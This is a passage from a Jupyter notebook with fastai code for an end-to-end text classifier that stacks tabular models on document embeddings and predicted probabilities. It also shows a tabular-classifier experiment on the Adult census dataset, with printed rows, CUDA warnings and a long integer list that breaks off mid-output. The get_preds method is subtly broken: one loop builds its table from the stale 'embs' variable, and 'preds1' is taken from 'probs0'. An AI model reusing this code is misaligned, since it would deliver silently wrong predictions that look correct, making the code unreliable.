from object to str\n\n # get docs embeddings list\n embs_ls = []\n for (txt_col, clf, lm) in zip(txt_cols, self.txt_clfs, self.lms):\n embs = get_fastai_docs_embs(docs=df[txt_col], learn=clf, lm=lm, df=None, txt_col=None)\n embs_ls.append(embs)\n \n # get prediction on labels and probabilities\n probs_ls = []\n for (clf, txt_col) in zip(self.txt_clfs, txt_cols):\n _, probs = fastai_learner_preds(learner=clf, df=df, txt_col=txt_col)\n probs_ls.append(probs.numpy())\n\n # tab_clfs[0] make predictions on embs_ls\n df_ = pd.concat([pd.DataFrame(embs) for embs in embs_ls], axis=1)\n df_.columns = list(range(df_.shape[1]))\n test_dl = 
self.tab_clfs[0].dls.test_dl(df_) #, with_labels=True\n probs0, _ = self.tab_clfs[0].get_preds(dl=test_dl)\n preds0 = probs0.numpy().argmax(axis=1)\n\n # tab_clfs[1] make predictions on probs_ls\n df_ = pd.concat([pd.DataFrame(embs) for probs in probs_ls], axis=1)\n df_.columns = list(range(df_.shape[1]))\n\n test_dl = self.tab_clfs[1].dls.test_dl(df_) #, with_labels=True\n probs1, _ = self.tab_clfs[1].get_preds(dl=test_dl)\n preds1 = probs0.numpy().argmax(axis=1)\n \n return (preds0, preds1), (probs0, probs1)\n\n", "_____no_output_____" ], [ "#dbck \nn2n_clf = End2End_Fastai_Texts_Classifier(txt_clfs=[clf0, clf1], lms=[lm0, lm1], tab_clfs=[tab_learn0, tab_learn1])\ndf_tmp = df.head(10).copy()\nn2n_clf.get_preds(df=df_tmp, txt_cols=txt_cols[:2])", "/usr/local/lib/python3.7/dist-packages/torch/autocast_mode.py:141: UserWarning: User provided device_type of 'cuda', but CUDA is not available. Disabling\n warnings.warn('User provided device_type of \\'cuda\\', but CUDA is not available. Disabling')\n/usr/local/lib/python3.7/dist-packages/torch/cuda/amp/grad_scaler.py:115: UserWarning: torch.cuda.amp.GradScaler is enabled, but CUDA is not available. Disabling.\n warnings.warn(\"torch.cuda.amp.GradScaler is enabled, but CUDA is not available. 
Disabling.\")\n" ] ], [ [ "### experiment: extract fastai tabular embeddings", "_____no_output_____" ] ], [ [ "#dbck\npath = untar_data(URLs.ADULT_SAMPLE)\ndf_ = pd.read_csv(path/'adult.csv')\nprint(df_.head())\nlabel_col_ = \"salary\"\ntab_learn = train_fastai_tabular_classifier(df=df_, label_col=label_col_, cnt_cols=None, cat_cols=None, lr=0.005, max_epochs=100, model_path='/content/drive/My Drive/fastai_multimodal/model/', model_name='tabular_model')\n", " age workclass fnlwgt education education-num \\\n0 49 Private 101320 Assoc-acdm 12.0 \n1 44 Private 236746 Masters 14.0 \n2 38 Private 96185 HS-grad NaN \n3 38 Self-emp-inc 112847 Prof-school 15.0 \n4 42 Self-emp-not-inc 82297 7th-8th NaN \n\n marital-status occupation relationship race \\\n0 Married-civ-spouse NaN Wife White \n1 Divorced Exec-managerial Not-in-family White \n2 Divorced NaN Unmarried Black \n3 Married-civ-spouse Prof-specialty Husband Asian-Pac-Islander \n4 Married-civ-spouse Other-service Wife Black \n\n sex capital-gain capital-loss hours-per-week native-country salary \n0 Female 0 1902 40 United-States >=50k \n1 Male 10520 0 45 United-States >=50k \n2 Female 0 0 32 United-States <50k \n3 Male 0 0 40 United-States >=50k \n4 Female 0 0 50 United-States <50k \nbefore adjustment...cnt_card=0.5\nbefore adjustment...cnt_card=16280\nbefore adjustment...txt_card=0.5\nbefore adjustment...txt_card=16280\n===== automatically identify\n cnt_cols=['education-num', 'fnlwgt']\n cat_cols=['age', 'capital-gain', 'capital-loss', 'education', 'hours-per-week', 'marital-status', 'native-country', 'occupation', 'race', 'relationship', 'sex', 'workclass'],\n img_cols=[], \n txt_cols=[] ======\n[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 
83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362, 363, 364, 365, 366, 367, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 378, 379, 380, 381, 382, 383, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393, 394, 395, 396, 397, 398, 399, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 411, 412, 413, 414, 415, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 426, 427, 428, 429, 430, 431, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 442, 443, 444, 445, 446, 447, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 458, 459, 460, 461, 462, 463, 464, 465, 466, 467, 468, 469, 470, 471, 472, 473, 474, 475, 476, 477, 478, 479, 480, 481, 482, 483, 484, 485, 
486, 487, 488, 489, 490, 491, 492, 493, 494, 495, 496, 497, 498, 499, 500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 512, 513, 514, 515, 516, 517, 518, 519, 520, 521, 522, 523, 524, 525, 526, 527, 528, 529, 530, 531, 532, 533, 534, 535, 536, 537, 538, 539, 540, 541, 542, 543, 544, 545, 546, 547, 548, 549, 550, 551, 552, 553, 554, 555, 556, 557, 558, 559, 560, 561, 562, 563, 564, 565, 566, 567, 568, 569, 570, 571, 572, 573, 574, 575, 576, 577, 578, 579, 580, 581, 582, 583, 584, 585, 586, 587, 588, 589, 590, 591, 592, 593, 594, 595, 596, 597, 598, 599, 600, 601, 602, 603, 604, 605, 606, 607, 608, 609, 610, 611, 612, 613, 614, 615, 616, 617, 618, 619, 620, 621, 622, 623, 624, 625, 626, 627, 628, 629, 630, 631, 632, 633, 634, 635, 636, 637, 638, 639, 640, 641, 642, 643, 644, 645, 646, 647, 648, 649, 650, 651, 652, 653, 654, 655, 656, 657, 658, 659, 660, 661, 662, 663, 664, 665, 666, 667, 668, 669, 670, 671, 672, 673, 674, 675, 676, 677, 678, 679, 680, 681, 682, 683, 684, 685, 686, 687, 688, 689, 690, 691, 692, 693, 694, 695, 696, 697, 698, 699, 700, 701, 702, 703, 704, 705, 706, 707, 708, 709, 710, 711, 712, 713, 714, 715, 716, 717, 718, 719, 720, 721, 722, 723, 724, 725, 726, 727, 728, 729, 730, 731, 732, 733, 734, 735, 736, 737, 738, 739, 740, 741, 742, 743, 744, 745, 746, 747, 748, 749, 750, 751, 752, 753, 754, 755, 756, 757, 758, 759, 760, 761, 762, 763, 764, 765, 766, 767, 768, 769, 770, 771, 772, 773, 774, 775, 776, 777, 778, 779, 780, 781, 782, 783, 784, 785, 786, 787, 788, 789, 790, 791, 792, 793, 794, 795, 796, 797, 798, 799, 800, 801, 802, 803, 804, 805, 806, 807, 808, 809, 810, 811, 812, 813, 814, 815, 816, 817, 818, 819, 820, 821, 822, 823, 824, 825, 826, 827, 828, 829, 830, 831, 832, 833, 834, 835, 836, 837, 838, 839, 840, 841, 842, 843, 844, 845, 846, 847, 848, 849, 850, 851, 852, 853, 854, 855, 856, 857, 858, 859, 860, 861, 862, 863, 864, 865, 866, 867, 868, 869, 870, 871, 872, 873, 874, 875, 876, 877, 878, 879, 880, 881, 882, 883, 884, 885, 
886, 887, 888, 889, 890, 891, 892, 893, 894, 895, 896, 897, 898, 899, 900, 901, 902, 903, 904, 905, 906, 907, 908, 909, 910, 911, 912, 913, 914, 915, 916, 917, 918, 919, 920, 921, 922, 923, 924, 925, 926, 927, 928, 929, 930, 931, 932, 933, 934, 935, 936, 937, 938, 939, 940, 941, 942, 943, 944, 945, 946, 947, 948, 949, 950, 951, 952, 953, 954, 955, 956, 957, 958, 959, 960, 961, 962, 963, 964, 965, 966, 967, 968, 969, 970, 971, 972, 973, 974, 975, 976, 977, 978, 979, 980, 981, 982, 983, 984, 985, 986, 987, 988, 989, 990, 991, 992, 993, 994, 995, 996, 997, 998, 999, 1000, 1001, 1002, 1003, 1004, 1005, 1006, 1007, 1008, 1009, 1010, 1011, 1012, 1013, 1014, 1015, 1016, 1017, 1018, 1019, 1020, 1021, 1022, 1023, 1024, 1025, 1026, 1027, 1028, 1029, 1030, 1031, 1032, 1033, 1034, 1035, 1036, 1037, 1038, 1039, 1040, 1041, 1042, 1043, 1044, 1045, 1046, 1047, 1048, 1049, 1050, 1051, 1052, 1053, 1054, 1055, 1056, 1057, 1058, 1059, 1060, 1061, 1062, 1063, 1064, 1065, 1066, 1067, 1068, 1069, 1070, 1071, 1072, 1073, 1074, 1075, 1076, 1077, 1078, 1079, 1080, 1081, 1082, 1083, 1084, 1085, 1086, 1087, 1088, 1089, 1090, 1091, 1092, 1093, 1094, 1095, 1096, 1097, 1098, 1099, 1100, 1101, 1102, 1103, 1104, 1105, 1106, 1107, 1108, 1109, 1110, 1111, 1112, 1113, 1114, 1115, 1116, 1117, 1118, 1119, 1120, 1121, 1122, 1123, 1124, 1125, 1126, 1127, 1128, 1129, 1130, 1131, 1132, 1133, 1134, 1135, 1136, 1137, 1138, 1139, 1140, 1141, 1142, 1143, 1144, 1145, 1146, 1147, 1148, 1149, 1150, 1151, 1152, 1153, 1154, 1155, 1156, 1157, 1158, 1159, 1160, 1161, 1162, 1163, 1164, 1165, 1166, 1167, 1168, 1169, 1170, 1171, 1172, 1173, 1174, 1175, 1176, 1177, 1178, 1179, 1180, 1181, 1182, 1183, 1184, 1185, 1186, 1187, 1188, 1189, 1190, 1191, 1192, 1193, 1194, 1195, 1196, 1197, 1198, 1199, 1200, 1201, 1202, 1203, 1204, 1205, 1206, 1207, 1208, 1209, 1210, 1211, 1212, 1213, 1214, 1215, 1216, 1217, 1218, 1219, 1220, 1221, 1222, 1223, 1224, 1225, 1226, 1227, 1228, 1229, 1230, 1231, 1232, 1233, 1234, 1235, 1236, 1237, 
1238, 1239, 1240, 1241, 1242, 1243, 1244, 1245, 1246, 1247, 1248, 1249, 1250, 1251, 1252, 1253, 1254, 1255, 1256, 1257, 1258, 1259, 1260, 1261, 1262, 1263, 1264, 1265, 1266, 1267, 1268, 1269, 1270, 1271, 1272, 1273, 1274, 1275, 1276, 1277, 1278, 1279, 1280, 1281, 1282, 1283, 1284, 1285, 1286, 1287, 1288, 1289, 1290, 1291, 1292, 1293, 1294, 1295, 1296, 1297, 1298, 1299, 1300, 1301, 1302, 1303, 1304, 1305, 1306, 1307, 1308, 1309, 1310, 1311, 1312, 1313, 1314, 1315, 1316, 1317, 1318, 1319, 1320, 1321, 1322, 1323, 1324, 1325, 1326, 1327, 1328, 1329, 1330, 1331, 1332, 1333, 1334, 1335, 1336, 1337, 1338, 1339, 1340, 1341, 1342, 1343, 1344, 1345, 1346, 1347, 1348, 1349, 1350, 1351, 1352, 1353, 1354, 1355, 1356, 1357, 1358, 1359, 1360, 1361, 1362, 1363, 1364, 1365, 1366, 1367, 1368, 1369, 1370, 1371, 1372, 1373, 1374, 1375, 1376, 1377, 1378, 1379, 1380, 1381, 1382, 1383, 1384, 1385, 1386, 1387, 1388, 1389, 1390, 1391, 1392, 1393, 1394, 1395, 1396, 1397, 1398, 1399, 1400, 1401, 1402, 1403, 1404, 1405, 1406, 1407, 1408, 1409, 1410, 1411, 1412, 1413, 1414, 1415, 1416, 1417, 1418, 1419, 1420, 1421, 1422, 1423, 1424, 1425, 1426, 1427, 1428, 1429, 1430, 1431, 1432, 1433, 1434, 1435, 1436, 1437, 1438, 1439, 1440, 1441, 1442, 1443, 1444, 1445, 1446, 1447, 1448, 1449, 1450, 1451, 1452, 1453, 1454, 1455, 1456, 1457, 1458, 1459, 1460, 1461, 1462, 1463, 1464, 1465, 1466, 1467, 1468, 1469, 1470, 1471, 1472, 1473, 1474, 1475, 1476, 1477, 1478, 1479, 1480, 1481, 1482, 1483, 1484, 1485, 1486, 1487, 1488, 1489, 1490, 1491, 1492, 1493, 1494, 1495, 1496, 1497, 1498, 1499, 1500, 1501, 1502, 1503, 1504, 1505, 1506, 1507, 1508, 1509, 1510, 1511, 1512, 1513, 1514, 1515, 1516, 1517, 1518, 1519, 1520, 1521, 1522, 1523, 1524, 1525, 1526, 1527, 1528, 1529, 1530, 1531, 1532, 1533, 1534, 1535, 1536, 1537, 1538, 1539, 1540, 1541, 1542, 1543, 1544, 1545, 1546, 1547, 1548, 1549, 1550, 1551, 1552, 1553, 1554, 1555, 1556, 1557, 1558, 1559, 1560, 1561, 1562, 1563, 1564, 1565, 1566, 1567, 1568, 1569, 1570, 
1571, 1572, 1573, 1574, 1575, 1576, 1577, 1578, 1579, 1580, 1581, 1582, 1583, 1584, 1585, 1586, 1587, 1588, 1589, 1590, 1591, 1592, 1593, 1594, 1595, 1596, 1597, 1598, 1599, 1600, 1601, 1602, 1603, 1604, 1605, 1606, 1607, 1608, 1609, 1610, 1611, 1612, 1613, 1614, 1615, 1616, 1617, 1618, 1619, 1620, 1621, 1622, 1623, 1624, 1625, 1626, 1627, 1628, 1629, 1630, 1631, 1632, 1633, 1634, 1635, 1636, 1637, 1638, 1639, 1640, 1641, 1642, 1643, 1644, 1645, 1646, 1647, 1648, 1649, 1650, 1651, 1652, 1653, 1654, 1655, 1656, 1657, 1658, 1659, 1660, 1661, 1662, 1663, 1664, 1665, 1666, 1667, 1668, 1669, 1670, 1671, 1672, 1673, 1674, 1675, 1676, 1677, 1678, 1679, 1680, 1681, 1682, 1683, 1684, 1685, 1686, 1687, 1688, 1689, 1690, 1691, 1692, 1693, 1694, 1695, 1696, 1697, 1698, 1699, 1700, 1701, 1702, 1703, 1704, 1705, 1706, 1707, 1708, 1709, 1710, 1711, 1712, 1713, 1714, 1715, 1716, 1717, 1718, 1719, 1720, 1721, 1722, 1723, 1724, 1725, 1726, 1727, 1728, 1729, 1730, 1731, 1732, 1733, 1734, 1735, 1736, 1737, 1738, 1739, 1740, 1741, 1742, 1743, 1744, 1745, 1746, 1747, 1748, 1749, 1750, 1751, 1752, 1753, 1754, 1755, 1756, 1757, 1758, 1759, 1760, 1761, 1762, 1763, 1764, 1765, 1766, 1767, 1768, 1769, 1770, 1771, 1772, 1773, 1774, 1775, 1776, 1777, 1778, 1779, 1780, 1781, 1782, 1783, 1784, 1785, 1786, 1787, 1788, 1789, 1790, 1791, 1792, 1793, 1794, 1795, 1796, 1797, 1798, 1799, 1800, 1801, 1802, 1803, 1804, 1805, 1806, 1807, 1808, 1809, 1810, 1811, 1812, 1813, 1814, 1815, 1816, 1817, 1818, 1819, 1820, 1821, 1822, 1823, 1824, 1825, 1826, 1827, 1828, 1829, 1830, 1831, 1832, 1833, 1834, 1835, 1836, 1837, 1838, 1839, 1840, 1841, 1842, 1843, 1844, 1845, 1846, 1847, 1848, 1849, 1850, 1851, 1852, 1853, 1854, 1855, 1856, 1857, 1858, 1859, 1860, 1861, 1862, 1863, 1864, 1865, 1866, 1867, 1868, 1869, 1870, 1871, 1872, 1873, 1874, 1875, 1876, 1877, 1878, 1879, 1880, 1881, 1882, 1883, 1884, 1885, 1886, 1887, 1888, 1889, 1890, 1891, 1892, 1893, 1894, 1895, 1896, 1897, 1898, 1899, 1900, 1901, 1902, 1903, 
1904, 1905, 1906, 1907, 1908, 1909, 1910, 1911, 1912, 1913, 1914, 1915, 1916, 1917, 1918, 1919, 1920, 1921, 1922, 1923, 1924, 1925, 1926, 1927, 1928, 1929, 1930, 1931, 1932, 1933, 1934, 1935, 1936, 1937, 1938, 1939, 1940, 1941, 1942, 1943, 1944, 1945, 1946, 1947, 1948, 1949, 1950, 1951, 1952, 1953, 1954, 1955, 1956, 1957, 1958, 1959, 1960, 1961, 1962, 1963, 1964, 1965, 1966, 1967, 1968, 1969, 1970, 1971, 1972, 1973, 1974, 1975, 1976, 1977, 1978, 1979, 1980, 1981, 1982, 1983, 1984, 1985, 1986, 1987, 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019, 2020, 2021, 2022, 2023, 2024, 2025, 2026, 2027, 2028, 2029, 2030, 2031, 2032, 2033, 2034, 2035, 2036, 2037, 2038, 2039, 2040, 2041, 2042, 2043, 2044, 2045, 2046, 2047, 2048, 2049, 2050, 2051, 2052, 2053, 2054, 2055, 2056, 2057, 2058, 2059, 2060, 2061, 2062, 2063, 2064, 2065, 2066, 2067, 2068, 2069, 2070, 2071, 2072, 2073, 2074, 2075, 2076, 2077, 2078, 2079, 2080, 2081, 2082, 2083, 2084, 2085, 2086, 2087, 2088, 2089, 2090, 2091, 2092, 2093, 2094, 2095, 2096, 2097, 2098, 2099, 2100, 2101, 2102, 2103, 2104, 2105, 2106, 2107, 2108, 2109, 2110, 2111, 2112, 2113, 2114, 2115, 2116, 2117, 2118, 2119, 2120, 2121, 2122, 2123, 2124, 2125, 2126, 2127, 2128, 2129, 2130, 2131, 2132, 2133, 2134, 2135, 2136, 2137, 2138, 2139, 2140, 2141, 2142, 2143, 2144, 2145, 2146, 2147, 2148, 2149, 2150, 2151, 2152, 2153, 2154, 2155, 2156, 2157, 2158, 2159, 2160, 2161, 2162, 2163, 2164, 2165, 2166, 2167, 2168, 2169, 2170, 2171, 2172, 2173, 2174, 2175, 2176, 2177, 2178, 2179, 2180, 2181, 2182, 2183, 2184, 2185, 2186, 2187, 2188, 2189, 2190, 2191, 2192, 2193, 2194, 2195, 2196, 2197, 2198, 2199, 2200, 2201, 2202, 2203, 2204, 2205, 2206, 2207, 2208, 2209, 2210, 2211, 2212, 2213, 2214, 2215, 2216, 2217, 2218, 2219, 2220, 2221, 2222, 2223, 2224, 2225, 2226, 2227, 2228, 2229, 2230, 2231, 2232, 2233, 2234, 2235, 2236, 
2237, 2238, 2239, 2240, 2241, 2242, 2243, 2244, 2245, 2246, 2247, 2248, 2249, 2250, 2251, 2252, 2253, 2254, 2255, 2256, 2257, 2258, 2259, 2260, 2261, 2262, 2263, 2264, 2265, 2266, 2267, 2268, 2269, 2270, 2271, 2272, 2273, 2274, 2275, 2276, 2277, 2278, 2279, 2280, 2281, 2282, 2283, 2284, 2285, 2286, 2287, 2288, 2289, 2290, 2291, 2292, 2293, 2294, 2295, 2296, 2297, 2298, 2299, 2300, 2301, 2302, 2303, 2304, 2305, 2306, 2307, 2308, 2309, 2310, 2311, 2312, 2313, 2314, 2315, 2316, 2317, 2318, 2319, 2320, 2321, 2322, 2323, 2324, 2325, 2326, 2327, 2328, 2329, 2330, 2331, 2332, 2333, 2334, 2335, 2336, 2337, 2338, 2339, 2340, 2341, 2342, 2343, 2344, 2345, 2346, 2347, 2348, 2349, 2350, 2351, 2352, 2353, 2354, 2355, 2356, 2357, 2358, 2359, 2360, 2361, 2362, 2363, 2364, 2365, 2366, 2367, 2368, 2369, 2370, 2371, 2372, 2373, 2374, 2375, 2376, 2377, 2378, 2379, 2380, 2381, 2382, 2383, 2384, 2385, 2386, 2387, 2388, 2389, 2390, 2391, 2392, 2393, 2394, 2395, 2396, 2397, 2398, 2399, 2400, 2401, 2402, 2403, 2404, 2405, 2406, 2407, 2408, 2409, 2410, 2411, 2412, 2413, 2414, 2415, 2416, 2417, 2418, 2419, 2420, 2421, 2422, 2423, 2424, 2425, 2426, 2427, 2428, 2429, 2430, 2431, 2432, 2433, 2434, 2435, 2436, 2437, 2438, 2439, 2440, 2441, 2442, 2443, 2444, 2445, 2446, 2447, 2448, 2449, 2450, 2451, 2452, 2453, 2454, 2455, 2456, 2457, 2458, 2459, 2460, 2461, 2462, 2463, 2464, 2465, 2466, 2467, 2468, 2469, 2470, 2471, 2472, 2473, 2474, 2475, 2476, 2477, 2478, 2479, 2480, 2481, 2482, 2483, 2484, 2485, 2486, 2487, 2488, 2489, 2490, 2491, 2492, 2493, 2494, 2495, 2496, 2497, 2498, 2499, 2500, 2501, 2502, 2503, 2504, 2505, 2506, 2507, 2508, 2509, 2510, 2511, 2512, 2513, 2514, 2515, 2516, 2517, 2518, 2519, 2520, 2521, 2522, 2523, 2524, 2525, 2526, 2527, 2528, 2529, 2530, 2531, 2532, 2533, 2534, 2535, 2536, 2537, 2538, 2539, 2540, 2541, 2542, 2543, 2544, 2545, 2546, 2547, 2548, 2549, 2550, 2551, 2552, 2553, 2554, 2555, 2556, 2557, 2558, 2559, 2560, 2561, 2562, 2563, 2564, 2565, 2566, 2567, 2568, 2569, 
2570, 2571, 2572, 2573, 2574, 2575, 2576, 2577, 2578, 2579, 2580, 2581, 2582, 2583, 2584, 2585, 2586, 2587, 2588, 2589, 2590, 2591, 2592, 2593, 2594, 2595, 2596, 2597, 2598, 2599, 2600, 2601, 2602, 2603, 2604, 2605, 2606, 2607, 2608, 2609, 2610, 2611, 2612, 2613, 2614, 2615, 2616, 2617, 2618, 2619, 2620, 2621, 2622, 2623, 2624, 2625, 2626, 2627, 2628, 2629, 2630, 2631, 2632, 2633, 2634, 2635, 2636, 2637, 2638, 2639, 2640, 2641, 2642, 2643, 2644, 2645, 2646, 2647, 2648, 2649, 2650, 2651, 2652, 2653, 2654, 2655, 2656, 2657, 2658, 2659, 2660, 2661, 2662, 2663, 2664, 2665, 2666, 2667, 2668, 2669, 2670, 2671, 2672, 2673, 2674, 2675, 2676, 2677, 2678, 2679, 2680, 2681, 2682, 2683, 2684, 2685, 2686, 2687, 2688, 2689, 2690, 2691, 2692, 2693, 2694, 2695, 2696, 2697, 2698, 2699, 2700, 2701, 2702, 2703, 2704, 2705, 2706, 2707, 2708, 2709, 2710, 2711, 2712, 2713, 2714, 2715, 2716, 2717, 2718, 2719, 2720, 2721, 2722, 2723, 2724, 2725, 2726, 2727, 2728, 2729, 2730, 2731, 2732, 2733, 2734, 2735, 2736, 2737, 2738, 2739, 2740, 2741, 2742, 2743, 2744, 2745, 2746, 2747, 2748, 2749, 2750, 2751, 2752, 2753, 2754, 2755, 2756, 2757, 2758, 2759, 2760, 2761, 2762, 2763, 2764, 2765, 2766, 2767, 2768, 2769, 2770, 2771, 2772, 2773, 2774, 2775, 2776, 2777, 2778, 2779, 2780, 2781, 2782, 2783, 2784, 2785, 2786, 2787, 2788, 2789, 2790, 2791, 2792, 2793, 2794, 2795, 2796, 2797, 2798, 2799, 2800, 2801, 2802, 2803, 2804, 2805, 2806, 2807, 2808, 2809, 2810, 2811, 2812, 2813, 2814, 2815, 2816, 2817, 2818, 2819, 2820, 2821, 2822, 2823, 2824, 2825, 2826, 2827, 2828, 2829, 2830, 2831, 2832, 2833, 2834, 2835, 2836, 2837, 2838, 2839, 2840, 2841, 2842, 2843, 2844, 2845, 2846, 2847, 2848, 2849, 2850, 2851, 2852, 2853, 2854, 2855, 2856, 2857, 2858, 2859, 2860, 2861, 2862, 2863, 2864, 2865, 2866, 2867, 2868, 2869, 2870, 2871, 2872, 2873, 2874, 2875, 2876, 2877, 2878, 2879, 2880, 2881, 2882, 2883, 2884, 2885, 2886, 2887, 2888, 2889, 2890, 2891, 2892, 2893, 2894, 2895, 2896, 2897, 2898, 2899, 2900, 2901, 2902, 
2903, 2904, 2905, 2906, 2907, 2908, 2909, 2910, 2911, 2912, 2913, 2914, 2915, 2916, 2917, 2918, 2919, 2920, 2921, 2922, 2923, 2924, 2925, 2926, 2927, 2928, 2929, 2930, 2931, 2932, 2933, 2934, 2935, 2936, 2937, 2938, 2939, 2940, 2941, 2942, 2943, 2944, 2945, 2946, 2947, 2948, 2949, 2950, 2951, 2952, 2953, 2954, 2955, 2956, 2957, 2958, 2959, 2960, 2961, 2962, 2963, 2964, 2965, 2966, 2967, 2968, 2969, 2970, 2971, 2972, 2973, 2974, 2975, 2976, 2977, 2978, 2979, 2980, 2981, 2982, 2983, 2984, 2985, 2986, 2987, 2988, 2989, 2990, 2991, 2992, 2993, 2994, 2995, 2996, 2997, 2998, 2999, 3000, 3001, 3002, 3003, 3004, 3005, 3006, 3007, 3008, 3009, 3010, 3011, 3012, 3013, 3014, 3015, 3016, 3017, 3018, 3019, 3020, 3021, 3022, 3023, 3024, 3025, 3026, 3027, 3028, 3029, 3030, 3031, 3032, 3033, 3034, 3035, 3036, 3037, 3038, 3039, 3040, 3041, 3042, 3043, 3044, 3045, 3046, 3047, 3048, 3049, 3050, 3051, 3052, 3053, 3054, 3055, 3056, 3057, 3058, 3059, 3060, 3061, 3062, 3063, 3064, 3065, 3066, 3067, 3068, 3069, 3070, 3071, 3072, 3073, 3074, 3075, 3076, 3077, 3078, 3079, 3080, 3081, 3082, 3083, 3084, 3085, 3086, 3087, 3088, 3089, 3090, 3091, 3092, 3093, 3094, 3095, 3096, 3097, 3098, 3099, 3100, 3101, 3102, 3103, 3104, 3105, 3106, 3107, 3108, 3109, 3110, 3111, 3112, 3113, 3114, 3115, 3116, 3117, 3118, 3119, 3120, 3121, 3122, 3123, 3124, 3125, 3126, 3127, 3128, 3129, 3130, 3131, 3132, 3133, 3134, 3135, 3136, 3137, 3138, 3139, 3140, 3141, 3142, 3143, 3144, 3145, 3146, 3147, 3148, 3149, 3150, 3151, 3152, 3153, 3154, 3155, 3156, 3157, 3158, 3159, 3160, 3161, 3162, 3163, 3164, 3165, 3166, 3167, 3168, 3169, 3170, 3171, 3172, 3173, 3174, 3175, 3176, 3177, 3178, 3179, 3180, 3181, 3182, 3183, 3184, 3185, 3186, 3187, 3188, 3189, 3190, 3191, 3192, 3193, 3194, 3195, 3196, 3197, 3198, 3199, 3200, 3201, 3202, 3203, 3204, 3205, 3206, 3207, 3208, 3209, 3210, 3211, 3212, 3213, 3214, 3215, 3216, 3217, 3218, 3219, 3220, 3221, 3222, 3223, 3224, 3225, 3226, 3227, 3228, 3229, 3230, 3231, 3232, 3233, 3234, 3235, 
3236, 3237, 3238, 3239, 3240, 3241, 3242, 3243, 3244, 3245, 3246, 3247, 3248, 3249, 3250, 3251, 3252, 3253, 3254, 3255, 3256, 3257, 3258, 3259, 3260, 3261, 3262, 3263, 3264, 3265, 3266, 3267, 3268, 3269, 3270, 3271, 3272, 3273, 3274, 3275, 3276, 3277, 3278, 3279, 3280, 3281, 3282, 3283, 3284, 3285, 3286, 3287, 3288, 3289, 3290, 3291, 3292, 3293, 3294, 3295, 3296, 3297, 3298, 3299, 3300, 3301, 3302, 3303, 3304, 3305, 3306, 3307, 3308, 3309, 3310, 3311, 3312, 3313, 3314, 3315, 3316, 3317, 3318, 3319, 3320, 3321, 3322, 3323, 3324, 3325, 3326, 3327, 3328, 3329, 3330, 3331, 3332, 3333, 3334, 3335, 3336, 3337, 3338, 3339, 3340, 3341, 3342, 3343, 3344, 3345, 3346, 3347, 3348, 3349, 3350, 3351, 3352, 3353, 3354, 3355, 3356, 3357, 3358, 3359, 3360, 3361, 3362, 3363, 3364, 3365, 3366, 3367, 3368, 3369, 3370, 3371, 3372, 3373, 3374, 3375, 3376, 3377, 3378, 3379, 3380, 3381, 3382, 3383, 3384, 3385, 3386, 3387, 3388, 3389, 3390, 3391, 3392, 3393, 3394, 3395, 3396, 3397, 3398, 3399, 3400, 3401, 3402, 3403, 3404, 3405, 3406, 3407, 3408, 3409, 3410, 3411, 3412, 3413, 3414, 3415, 3416, 3417, 3418, 3419, 3420, 3421, 3422, 3423, 3424, 3425, 3426, 3427, 3428, 3429, 3430, 3431, 3432, 3433, 3434, 3435, 3436, 3437, 3438, 3439, 3440, 3441, 3442, 3443, 3444, 3445, 3446, 3447, 3448, 3449, 3450, 3451, 3452, 3453, 3454, 3455, 3456, 3457, 3458, 3459, 3460, 3461, 3462, 3463, 3464, 3465, 3466, 3467, 3468, 3469, 3470, 3471, 3472, 3473, 3474, 3475, 3476, 3477, 3478, 3479, 3480, 3481, 3482, 3483, 3484, 3485, 3486, 3487, 3488, 3489, 3490, 3491, 3492, 3493, 3494, 3495, 3496, 3497, 3498, 3499, 3500, 3501, 3502, 3503, 3504, 3505, 3506, 3507, 3508, 3509, 3510, 3511, 3512, 3513, 3514, 3515, 3516, 3517, 3518, 3519, 3520, 3521, 3522, 3523, 3524, 3525, 3526, 3527, 3528, 3529, 3530, 3531, 3532, 